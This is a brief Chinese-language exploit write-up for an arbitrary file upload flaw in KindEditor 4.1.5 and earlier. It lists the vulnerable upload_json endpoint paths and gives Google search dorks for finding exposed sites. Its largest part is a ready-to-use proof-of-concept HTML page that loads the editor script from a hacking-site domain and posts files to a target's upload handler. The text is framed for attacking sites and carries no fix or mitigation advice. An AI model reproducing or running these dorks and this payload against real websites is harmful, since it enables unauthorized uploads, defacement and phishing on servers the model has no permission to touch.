kindeditor<=4.1.5 文件上传漏洞

摘要

漏洞存在于 kindeditor 编辑器里，你能上传. txt 和. html 文件，支持 php/asp/jsp/asp.net

漏洞存在于 kindeditor 编辑器里，你能上传. txt 和. html 文件，支持 php/asp/jsp/asp.net

漏洞存在于小于等于 kindeditor4.1.5 编辑器中

根本脚本语言自定义不同的上传地址，上传之前有必要验证文件 upload_json.* 的存在

/asp/upload_json.asp

/asp.net/upload_json.ashx

/jsp/upload_json.jsp

/php/upload_json.php

关键字：

allinurl:/examples/uploadbutton.html

allinurl:/php/upload_json.php / .asp / .jsp

poc

<html><head>  <title>kindeditor<=4.1.5文件上传</title>  <script src="https://www.0dayhack.com/kindeditor/kindeditor-min.js"></script>  <script>  KindEditor.ready(function(K) {  var uploadbutton = K.uploadbutton({  button : K('#uploadButton')[0],  fieldName : 'imgFile',  url : 'https://www.0dayhack.com/kindeditor/asp/upload_json.asp?dir=file',  afterUpload : function(data) {  if (data.error === 0) {  var url = K.formatUrl(data.url, 'absolute');  K('#url').val(url);}  },  });  uploadbutton.fileBox.change(function(e) {  uploadbutton.submit();  });  });  </script></head><body>  <div class="upload">  <input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />  <input type="button" id="uploadButton" value="Upload" />  </div>  </body>  </html>